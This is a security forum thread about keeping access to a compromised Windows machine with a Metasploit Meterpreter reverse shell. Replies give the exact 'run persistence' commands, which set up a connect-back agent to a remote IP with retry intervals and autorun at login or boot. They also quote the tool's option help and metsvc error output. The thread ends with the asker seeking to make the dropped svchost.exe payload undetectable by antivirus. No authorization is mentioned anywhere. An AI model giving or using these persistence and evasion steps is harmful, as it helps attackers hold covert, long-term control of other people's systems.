look in /pentest/exploits/framework3/scripts/meterpreter/ for persistance.rb
how to make a meterpreter reverse shell maintain access ?
Hello,
I was wondering about how to maintain access after uploading a meterpreter reverse_shell using metasploit on the attacked machine? i know about metsvc, but it uses a bind shell.
Any help would be appreciated, thanx in advance.
Regards
look in /pentest/exploits/framework3/scripts/meterpreter/ for persistance.rb
I would rather be hated for what i am,
Then loved for what i am not.
take a look here:
w w w . metasploit . com / redmine / issues / 386
"remove the spaces, I'm not allowed to post URLs yet"
So, after getting the meterpreter shell type the following:Adds a persistent VBS payload option (keep running the payload in a loop) via the loop-vbs type in msfencode. Adds a 'persistence' script to allow easy persistent meterpeter agent deployment. "run persistence -h" for help. Sample command line:
meterpreter> run persistence -r 1.2.3.4 -p 443 -A -X -i 300
This would install a meterpreter agent that would try to connect to 1.2.3.4:443 once every 300 seconds. This would also start a multi/handler in the background (-A) and make this autorun when any user logs in (-X). In mostscenarios, this works just fine:
meterpreter> run persistence -A
This uses your default IP and the default port and immediates handles the next connection, but doesnt install via the registry.
Code:meterpreter > run persistence -h OPTIONS: -A Automatically start a matching multi/handler to connect to the agent -X Automatically start the agent when the system boots -h This help menu -i <opt> The interval in seconds between each connection attempt -p <opt> The port on the remote host where Metasploit is listening -r <opt> The IP of the system running Metasploit listening for the connect back meterpreter >
Give it a try, if you fail, just tell me so I can explain better...
thanx guys, ill give it a try and let you know.
nice post thanks
Hello,
sorry for the late reply as i have been busy the past few days. anyway, i tried to run the script : run metsvc after getting a session but im getting this problem:
[*] >> Uploading metsrv.dll...[*] >> Uploading metsvc-server.exe...[*] >> Uploading metsvc.exe...[*] Starting the service...
* Installing service metsvc
Cannot create service (0x00000431)
meterpreter >
and when i run the persistence.rb script it works fine, but the anti virus detects a file called svchost.exe.
any ideas ?
must-read-first:
http://www.offensive-security.com/me...it-unleashed/#
thank you, but i did read that.
any ideas guys?
Turn off your antivirus?Originally Posted by AlinuX
Still not underestimating the power...
There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
of course it wont get detected, i need it to be undetectable to the anti virus also.
regards
Posting Permissions